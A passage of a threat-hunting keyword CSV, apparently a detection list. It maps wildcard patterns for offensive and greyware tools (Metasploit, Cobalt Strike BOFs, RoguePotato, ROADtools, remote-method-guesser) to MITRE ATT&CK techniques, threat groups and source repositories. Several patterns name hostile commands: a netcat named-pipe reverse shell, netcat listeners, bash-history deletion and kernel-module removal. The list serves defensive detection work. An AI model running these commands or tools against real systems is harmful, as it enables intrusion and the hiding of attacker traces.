Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*RiccardoAncarani/BOFs*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOFs) for shells and lols,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/BOFs,1,1,N/A,10,10,104,12,2021-09-14T09:03:58Z,2021-08-27T10:04:12Z -*RiccardoAncarani/LiquidSnake*,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,1,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*RiccardoAncarani/TaskShell*,offensive_tool_keyword,cobaltstrike,tamper scheduled task with a binary,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/TaskShell,1,1,N/A,10,10,54,8,2021-02-15T19:23:13Z,2021-02-15T19:22:26Z -*rid_hijack.py*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*ridbrute_attack*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*ridrelay*,offensive_tool_keyword,ridrelay,Quick and easy way to get domain usernames while on an internal network.,T1175 - T1553.002 - T1553.003,TA0003 - TA0008 - TA0009,N/A,N/A,Sniffing & Spoofing,https://github.com/skorov/ridrelay,1,0,N/A,N/A,4,375,62,2020-05-20T03:35:32Z,2018-04-14T22:10:01Z -*Ripemd-160.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*rkervella/CarbonMonoxide*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*rlwrap -cAr nc -lvnp *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*rlwrap nc -lvnp *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*rm .bash_history*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*rm /home/*/.bash_history*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*rm /root/.bash_history*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*rm -f *.o dump_vdso test_payload*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/timwr/CVE-2016-5195,1,0,N/A,N/A,10,935,404,2021-02-03T16:03:40Z,2016-10-21T11:19:21Z -*rm -f backpipe* mknod /tmp/backpipe p && nc *,greyware_tool_keyword,shell,Reverse Shell Command Line,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*rmg bind * jmxrmi --bind-objid *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg bind *127.0.0.1:*--localhost-bypass*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg call * --plugin GenericPrint.jar*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg call * --signature * --bound-name plain-server*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg codebase *http* --component *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg codebase *java.util.HashMap *--bound-name legacy-service*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg enum *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg guess * *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg known javax.management.remote.rmi.RMIServerImpl_Stub*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg listen * CommonsCollections*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg listen 0.0.0.0 *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg objid *[*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg roguejmx *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg scan *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg scan * --ports *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg serial * AnTrinh * --component *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg serial *CommonsCollections*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg-*-jar-with-dependencies.jar*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg*--yso*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*RMIRegistryExploit.java*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*rmmod -r*,greyware_tool_keyword,rmmod,Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.,T1547.006 - T1070.006,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*rmmod --remove*,greyware_tool_keyword,rmmod,Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.,T1547.006 - T1070.006,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*roadrecon plugin *,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,0,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*roadrecon*gather.py*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,0,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*roadrecon.db*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,1,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*roadrecon/frontend*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,1,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*ROADtools.git*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,1,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*ROADtools-master*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,1,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*roastinthemiddle -i * -t * -u *.txt -g *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*robertdavidgraham/masscan*,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,1,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -*RobustPentestMacro*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*ROCAVulnerabilityTester*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,1,N/A,N/A,,N/A,,, -*rockyou.txt.gz*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*rockyou.txt.gz*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*rockyou-30000.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*RogueOxidResolver.cpp*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*RoguePotato.cpp*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*RoguePotato.exe*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*RoguePotato.sln*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*RoguePotato.zip*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*RoguePotato-master*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*RogueSploit*,offensive_tool_keyword,RogueSploit,RogueSploit is an open source automated script made to create a Fake Acces Point. with dhcpd server. dns spoofing. host redirection. browser_autopwn1 or autopwn2 or beef+mitmf,T1534 - T1565 - T1566 - T1573 - T1590,TA0001 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/h0nus/RogueSploit,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*RogueWinRM dll.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*RogueWinRM exe.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*RogueWinRM.c*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 